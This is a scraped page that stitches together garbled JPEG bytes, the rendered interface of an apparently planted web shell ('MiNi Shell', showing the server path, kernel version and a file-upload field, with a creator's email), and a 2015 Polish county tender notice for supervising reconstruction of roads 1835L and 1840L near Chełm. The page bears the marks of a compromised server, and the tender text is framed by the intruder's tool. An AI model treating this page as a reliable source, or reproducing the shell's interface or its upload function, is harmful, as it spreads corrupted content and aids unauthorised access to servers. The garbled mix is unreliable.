JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150203/14567-N-2015.html

<p class="kh_header"><b>Chełm: Pełnienie nadzoru inwestorskiego nad realizacją zadania- Usprawnienie ponadlokalnej komunikacji na terenie powiatu chełmskiego- Przebudowa dróg powiatowych Nr 1835L i Nr 1840L</b><br>
<b>Numer ogłoszenia: 14567 - 2015; data zamieszczenia: 03.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Chełmski , Plac Niepodległości 1, 22-100 Chełm, woj. lubelskie, tel. 82 5627501, faks 82 5627510.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.powiat.chelm.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru inwestorskiego nad realizacją zadania- Usprawnienie ponadlokalnej komunikacji na terenie powiatu chełmskiego- Przebudowa dróg powiatowych Nr 1835L i Nr 1840L.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie pełnego nadzoru inwestorskiego nad robotami branży drogowej dotyczącymi zadania pn. Usprawnienie ponadlokalnej komunikacji na terenie powiatu chełmskiego- Przebudowa dróg powiatowych Nr 1835L i Nr 1840L. W trakcie realizacji zadania inwestycyjnego Wykonawca będzie sprawował funkcję nadzoru inwestorskiego w pełnym zakresie, wynikającym z art. 25 i 26 ustawy z dnia 7 lipca 1994 r. Prawo budowlane /Dz. U. z 2013 r. poz. 14019/ oraz będzie odpowiedzialny za realizację zadania i jego rozliczenie. Inspektor nadzoru ma nadzorować budowę codzienne od dnia przekazania placu budowy do dnia ostatecznego odbioru robót w czasie trwania prac budowlanych związanych z realizacją zadania. Na żądanie Zamawiającego Wykonawca ma obowiązek stawienia się na placu budowy w ciągu 1 godziny od telefonicznego wezwania Wykonawcy przez Zamawiającego.
Do zadań Wykonawcy w trakcie realizacji zadania należy w szczególności:
a)prowadzenie nadzoru nad prawidłowym przebiegiem robót zgodnie z umową. 
b)kontrola i dopilnowanie, aby wszystkie używane urządzenia i materiały posiadały stosowne świadectwa i certyfikaty wymagane przepisami i dokumentacją projektową.
c)sprawdzenie ważności ubezpieczeń osób zatrudnionych oraz używanego sprzętu. 
d)kontrola prawidłowości prowadzenia dziennika budowy i dokonywanie w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla właściwego procesu budowlanego.
e)rozstrzyganie wątpliwości natury technicznej powstałych w toku prowadzonych robót, a w razie potrzeby zasięganie opinii autora projektu.
f)uczestniczenie przy prowadzeniu przez Wykonawcę robót koniecznych prób, pomiarów i sprawdzeń.
g)egzekwowanie od Wykonawcy dodatkowych badań i pomiarów względnie przeprowadzenia badań niezależnych w przypadku wątpliwości, co do wiarygodności badań Wykonawcy robót.
h)wydawanie kierownikowi budowy lub kierownikowi robót poleceń potwierdzonych wpisem do dziennika budowy dotyczących: wykonywania prób, wymagających odkrycia robót lub elementów zakrytych. 
i)kontrola i odbiór robót budowlanych ulegających zakryciu lub zanikających. 
j)zawieszenie robót budowlanych w przypadku gdyby ich kontynuacja mogła wywołać zagrożenie życia lub zdrowia ludzi bądź spowodować znaczne straty materialne.
k)kontrola i weryfikacja wszelkich przedkładanych przez Wykonawcę robót dokumentów.
l)kontrola postępu wykonywanych robót.
m)potwierdzenie faktycznie wykonanego zakresu robót jako podstawy do wystawienia faktury zgodnie z postanowieniami umowy zawartej między Zamawiającym i wykonawcą robót budowlanych.
n)weryfikacja, analizowanie i zatwierdzanie do zapłaty faktur wystawionych przez Wykonawcę robót budowlanych w związku z realizacją umowy na roboty budowlane.
o)uzgadnianie z Wykonawcą robót budowlanych rodzaju dokumentacji powykonawczej, sprawdzanie jej i zatwierdzanie w porozumieniu z Zamawiającym.
p)uczestnictwo w komisji odbioru końcowego inwestycji oraz komisjach odbiorów gwarancyjnych, w tym prowadzenie wraz z Zamawiającym przeglądów gwarancyjnych. Zamawiający zakłada, że w okresie gwarancyjnym przynajmniej raz na rok dokonywane będą przeglądy stanu technicznego wybudowanych i przebudowanych obiektów. 
q)zarządzanie całym procesem przekazania obiektu do użytkowania.
Zakres robót objętych nadzorem inwestorskim obejmuje:
Przedmiotem zadania jest wykonanie przebudowy dróg powiatowych: Nr 1835L od km 0+000 (skrzyżowanie z drogą wojewódzką Nr 843) do km 5+062,14 (skrzyżowanie z drogą powiatową Nr 1840L) oraz Nr 1840L od km 6+466 (skrzyżowanie z drogą powiatową Nr 1835L) do km 9+052,57 o łącznej długości 7 648,71 m. 
Parametry drogi:
- klasa techniczna drogi- Z,
- typ przekroju normalnego- szlakowy w terenie niezabudowanym i półuliczny w terenie zabudowanym,
- liczba jezdni- 1,
- liczba pasów ruchu- 2,
- kategoria ruchu drogowego- KR2,
- szerokość poboczy- 1,00 m.
1.Roboty przygotowawcze: roboty pomiarowe, rozebranie nawierzchni z mieszanek mineralno- bitumicznych, rozebranie nawierzchni z tłucznia, rozebranie przepustów rurowych, karczowanie krzaków i podszycia (0,80 ha), oczyszczenie terenu z pozostałości po wykarczowaniu- drobne gałęzie, korzenie, kora i wrzos.
2.Roboty ziemne: usunięcie warstwy ziemi urodzajnej, koryta wykonywane na poszerzeniach, na jezdniach, profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne.
3.Podbudowy: podbudowy (3 572,60 m2) z kruszyw, tłuczeń, wzmacnianie podłoża gruntowego geokratami  (4 000,00 m2), wyrównanie istniejącej podbudowy.
4.	Nawierzchnia: planuje się wykonanie nawierzchni na drodze powiatowej Nr 1835L  od km 0+230,30 do km 5+062,14 i na drodze Nr 1840L od km 6+466 do km 9+008,30. Zakres robót: oczyszczenie nawierzchni drogowych (95 567,32 m2), skropienie nawierzchni drogowych asfaltem (95 567,32 m2), wyrównanie istniejącej podbudowy mieszanką mineralno- bitumiczną (9 245,22 t), nawierzchnie z mieszanek  mineralno- bitumicznych grysowo- żwirowych, warstwa asfaltowa wiążąca (5 400,00 m2) grubości 4 cm, nawierzchnie z mieszanek mineralno- bitumicznych grysowo- żwirowych, warstwa asfaltowa ścieralna (44 284,92 m2) grubości 3 cm,
5.Skrzyżowania: przewiduje się korektę promieni wyokrąglających krawędzie jezdni na skrzyżowaniach: 2+000 z drogą powiatową, 3+533,88 z drogą gminną, 4+075,35 z drogą gminną, 5+062,14 z drogą powiatową.
6.Zjazdy: przewiduje się dostosowanie zjazdów o nawierzchni z betonowej kostki brukowej do przebudowywanej drogi powiatowej polegające na przełożeniu istniejącej kostki brukowej. Na pozostałe zjazdy indywidualne przewiduje się zjazd z kruszywa na szerokości projektowanego pobocza. Ilość zjazdów do przebudowy- 27,00 szt. 
7.Zatoki autobusowe: przewiduje się przebudowę zatok autobusowych - typ zamknięty z peronami. W miejscu, gdzie nie ma możliwości wykonania zatoki autobusowej ze względu na istniejące zagospodarowanie przyległego terenu przystanki zlokalizowano na jezdni. Ilość zatok do przebudowy- 3 szt., przystanki na jezdni- 7 szt.
8.Chodniki: dla obsługi ruchu pieszych przewidziano do wykonania chodnik jednostronny, a w rejonie przejść dla pieszych- chodnik dwustronny. Długość chodników do przebudowy- 416,35 m.
9.Odwodnienie: przewiduje się przebudowę istniejących przepustów z rur betonowych pod koroną drogi na przepusty z rur karbowanych. Ilość przepustów do przebudowy- 4 szt. Na całym przebudowywanym odcinku przewiduje się lokalnie rowy odparowujące muldowe w miejscach, gdzie na to pozwala pas drogowy (w szczególności przez odcinki przebiegające przez miejscowości) oraz odtworzenie istniejących rowów przydrożnych. W km 8+830 przewidziano przebudowę studzienek ściekowych.
10.Oświetlenie: przewidziano wymianę opraw oświetleniowych zewnętrznych na wysięgnikach.
11.Oznakowanie i urządzenia bezpieczeństwa ruchu drogowego: 
a.ze względu na słabą widoczność  na skrzyżowaniu z drogą wojewódzką Nr 843 zainstalowany zostanie znak drogowy aktywny B-20 STOP (1 szt.),
b.w obrębie skrzyżowania z drogą wojewódzką Nr 843 na długości 36,5 m zastosowane zostaną linie spowalniające. Wypukłość pozioma na jezdni w postaci linii spowalniających wymusi na kierującym pojazdem zmniejszenie prędkości,
c.P-10- przejścia dla pieszych, planuje się wykonać przejścia dla pieszych w miejscu zwiększonego ruchu pieszych, przede wszystkim dzieci, 
d.zainstalowane zostaną znaki drogowe D-6 przejście dla pieszych wraz z aktywnymi znakami diodowymi D-6 zasilanymi z baterii słonecznej w pobliżu szkoły. Znak oznaczy i oświetli przejście dla pieszych, jest doskonale widoczny nawet w trudnych warunkach atmosferycznych, a jednocześnie  nie powoduje oślepienia kierujących pojazdami,
e.przy przejściu dla pieszych  zastosowane zostaną płytki naprowadzające dla niewidomych - pozwoli to na bezpieczne poruszanie się osób niewidomych i słabowidzących- dzięki temu osoba niewidoma wie, w którym miejscu znajduje się przejście oraz zostaje poinformowana w jakim kierunku biegnie,
f.na skrzyżowaniu w km 2+200 zastosowane zostanie oznakowanie poziome w postaci: powierzchni wyłączonej z ruchu (P-21b), przez co wskazany zostanie dokładny tor jazdy pojazdu, P-13- linia warunkowego zatrzymania, która wskaże miejsce zatrzymania pojazdu w celu ustąpienia pierwszeństwa oraz P-7a- linia krawędziowa wyznaczająca krawędź jezdni. 
g.na skrzyżowaniu w km 3+533 zastosowana zostanie linia krawędziowa P-7a wyznaczająca krawędź jezdni oraz ustawiony zostanie znak B-20 STOP, 
h.na skrzyżowaniu z drogą powiatową Nr 1840L zainstalowany zostanie znak aktywny B-20 STOP oraz zastosowane zostaną na długości 71,5 m linie spowalniające- ich wypukłość wymusi na kierującym pojazdem zmniejszenie prędkości,
i.ustawione zostaną znaki informacyjne D-15 - przystanek autobusowy- przy zatokach i miejscach do wysiadania wyznaczonych na jezdni. Przy przystankach autobusowych wyznaczonych na jezdni zastosowane zostanie również oznakowanie poziome- P-17- linia przystankowa,
j.w celu zapewnienia bezpieczeństwa ustawione zostaną bariery ochronne stalowe na długości 24,00 m oraz poręcze ochronne łańcuchowe na długości 22,00 m,
12.Roboty wykończeniowe:  plantowanie skarp i dna wykopów, obsianie skarp w ziemi urodzajnej, oczyszczenie rowu z namułu z wyprofilowaniem skarp, wykonanie poboczy z kruszywa łamanego na długości 7,984 km.
1.Szczegółowy zakres robót i warunki realizacji określa dokumentacja techniczna, tj. w szczególności: projekt budowlano- wykonawczy, przedmiar robót, szczegółowa specyfikacja techniczna wykonania i odbioru robót, projekt stałej organizacji ruchu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku posiadania wiedzy i doświadczenia Wykonawca winien wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wykonał co najmniej 2 usługi polegające na nadzorze inwestorskim nad robotami branży drogowej w zakresie budowy lub przebudowy dróg o nawierzchni asfaltowej w zakresie nie mniejszym niż 20 000,00 m2 każda wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów czy zostały lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca winien wykazać dysponowanie osobami: 1 osobą do pełnienia funkcji Inspektora nadzoru branży drogowej posiadającą ważne uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności drogowej oraz min. 36 miesięczny staż pracy na stanowisku inspektora nadzoru nad robotami branży drogowej. Uprawnienia budowlane powinny być wydane zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane. W przypadku nabycia uprawnień w innym kraju niż Polska będą także uznawane kwalifikacje zawodowe nabyte w państwach członkowskich Unii Europejskiej oraz państwach Europejskiego Obszaru Gospodarczego (European Economic Area- EEA) i Konfederacji Szwajcarskiej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli Wykonawca polega  na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie  tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.  Dopuszcza się możliwość złożenia oferty wspólnej przez dwóch lub więcej wykonawców w rozumieniu art. 23 ustawy. W przypadku złożenia oferty wspólnej każdy z wykonawców musi oddzielnie udokumentować spełnienie wymagań określonych w art. 22 ust. 1 pkt 1  oraz w art. 24 ustawy. Wymagania określone w art. 22 ust. 1 pkt 2, 3 i 4 ustawy Wykonawcy mogą spełniać wspólnie. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu i zawarcia umowy   w sprawie zamówienia publicznego. Dokumenty należy złożyć w formie oryginału lub kopi poświadczonej za zgodność z oryginałem przez Wykonawcę bądź upoważnionego przedstawiciela Wykonawcy, zgodnie z treścią dokumentu określającego status Wykonawcy bądź treścią załączonego do oferty pełnomocnictwa.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje zmiany istotnych postanowień  zawartej umowy  w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy.
2.Zamawiający dopuszcza możliwość zmiany ustaleń zawartej umowy w stosunku do treści oferty w zakresie:
1)terminu realizacji umowy gdy jest ona spowodowana:
a)warunkami atmosferycznymi uniemożliwiającymi wykonywanie robót w stosunku do których prowadzony jest nadzór (przez warunki atmosferyczne uniemożliwiające wykonywanie robót należy rozumieć warunki atmosferyczne w znaczny sposób odbiegające od warunków zwykle panujących o tej samej porze roku na terenie realizowania robót,
b)epidemią stwierdzoną przez uprawnione do tego organy,
c)siłą wyższą, 
d)wadami dokumentacji projektowej uniemożliwiającymi prawidłowe wykonanie przedmiotu umowy zgodnie z zasadami sztuki budowlanej i skutkującymi przerwą w realizacji robót budowlanych.
2)zmiany osób przewidzianych do realizacji zamówienia przez strony w przypadku zdarzeń takich jak: śmierć, choroba, ustanie stosunku pracy, zmiana zakresu obowiązków pod warunkiem, że zaproponowane osoby będą miały kwalifikacje nie niższe od osób wskazanych w umowie.
3.Zmiany umowy wymagają zgody Zamawiającego i Wykonawcy w formie sporządzonego na piśmie i podpisanego przez strony aneksu. Poza przypadkami wymienionymi wyżej Zamawiający nie przewiduje zmiany innych istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.powiat.chelm.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Chełmie, Plac Niepodległości 1, 22-100 Chełm, I piętro,  pokój Nr 25.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.02.2015 godzina 10:00, miejsce: 12.02.2015, godzina 10:00, miejsce: Starostwo Powiatowe w Chełmie, Plac Niepodległości 1, 22-100 Chełm, I piętro, pokój Nr 127.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com